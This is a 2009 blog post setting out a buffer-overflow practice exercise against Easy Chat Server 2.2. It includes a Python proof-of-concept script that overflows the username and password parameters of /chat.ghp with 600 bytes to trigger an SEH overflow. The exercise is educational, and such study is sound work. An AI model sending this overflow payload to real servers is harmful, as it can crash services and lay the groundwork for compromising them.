2009
09.12

BoF Exersice

Something that I enjoy doing, and which helps understanding buffer overflows / exploit coding is practice.

Grabe a known vulnerable application, find a PoC (proff of concept) and start from there. Here’s a start for anyone trying. Had loads of fun with this one:
Easy Chat Server 2.2

-First find and download the application (trial version should do fine) try -this-
-Install the application (make sure it works)
-Get a debugger (I suggest Ollydbg)
-Copy paste this PoC, it’s python but you can rewrite it in a language you may be more familiar with. Remember to change the IP/Port settings to your own Easy Chat Server
[this is based on his0k4 's exploit on milw0rm]
==================================================
#!/usr/bin/python
#Bug :
#EFS Easy Chat Server Authentication Request
#Buffer Overflow Exploit (SEH)

import struct
import socket

buffer = ‘\x41′ * 600

head = “GET /chat.ghp?username=”+buffer+”&password=”+buffer+”&room=1 HTTP/1.1\r\n”
head += “Host: 192.168.1.200\r\n”

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((’192.168.1.200′,8080))
s.send(head + “\r\n\r\n”)
s.close()
==================================================

Got this to work under Windows XP Pro SP3 English. Good practice…
Use the links I provided in a previous post and have fun.

Good luck

Comments are closed.